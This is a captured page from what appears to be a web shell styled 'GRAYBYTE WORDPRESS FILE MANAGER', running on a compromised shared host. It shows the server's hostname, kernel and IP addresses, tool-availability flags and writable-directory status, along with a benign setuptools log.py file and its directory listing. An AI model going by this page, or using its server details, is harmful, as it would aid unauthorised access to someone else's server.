✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.36
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/alt/python311/lib/python3.11/site-packages/setuptools/_distutils//log.py
"""
A simple log mechanism styled after PEP 282.

Retained for compatibility and should not be used.
"""

import logging
import warnings

from ._log import log as _global_log


DEBUG = logging.DEBUG
INFO = logging.INFO
WARN = logging.WARN
ERROR = logging.ERROR
FATAL = logging.FATAL

log = _global_log.log
debug = _global_log.debug
info = _global_log.info
warn = _global_log.warning
error = _global_log.error
fatal = _global_log.fatal


def set_threshold(level):
    orig = _global_log.level
    _global_log.setLevel(level)
    return orig


def set_verbosity(v):
    if v <= 0:
        set_threshold(logging.WARN)
    elif v == 1:
        set_threshold(logging.INFO)
    elif v >= 2:
        set_threshold(logging.DEBUG)


class Log(logging.Logger):
    """distutils.log.Log is deprecated, please use an alternative from `logging`."""

    def __init__(self, threshold=WARN):
        warnings.warn(Log.__doc__)  # avoid DeprecationWarning to ensure warn is shown
        super().__init__(__name__, level=threshold)

    @property
    def threshold(self):
        return self.level

    @threshold.setter
    def threshold(self, level):
        self.setLevel(level)

    warn = logging.Logger.warning


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
1 May 2025 1.08 PM
root / linksafe
0755
__pycache__
--
1 May 2025 1.08 PM
root / linksafe
0755
command
--
1 May 2025 1.08 PM
root / linksafe
0755
__init__.py
0.351 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
_collections.py
5.181 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
_functools.py
0.401 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
_log.py
0.042 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
_macos_compat.py
0.233 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
_msvccompiler.py
19.181 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
archive_util.py
8.371 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
bcppcompiler.py
14.406 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
ccompiler.py
46.202 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
cmd.py
17.448 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
config.py
4.796 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
core.py
9.177 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
cygwinccompiler.py
11.662 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
debug.py
0.136 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
dep_util.py
3.334 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
dir_util.py
7.883 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
dist.py
49.014 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
errors.py
3.505 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
extension.py
10.029 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
fancy_getopt.py
17.481 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
file_util.py
8.021 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
filelist.py
13.394 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
log.py
1.173 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
msvc9compiler.py
29.496 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
msvccompiler.py
23.027 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
py38compat.py
0.212 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
py39compat.py
0.624 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
spawn.py
3.413 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
sysconfig.py
18.334 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
text_file.py
11.813 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
unixccompiler.py
15.236 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
util.py
17.673 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
version.py
12.648 KB
13 Nov 2023 10.03 PM
root / linksafe
0644
versionpredicate.py
5.083 KB
13 Nov 2023 10.03 PM
root / linksafe
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF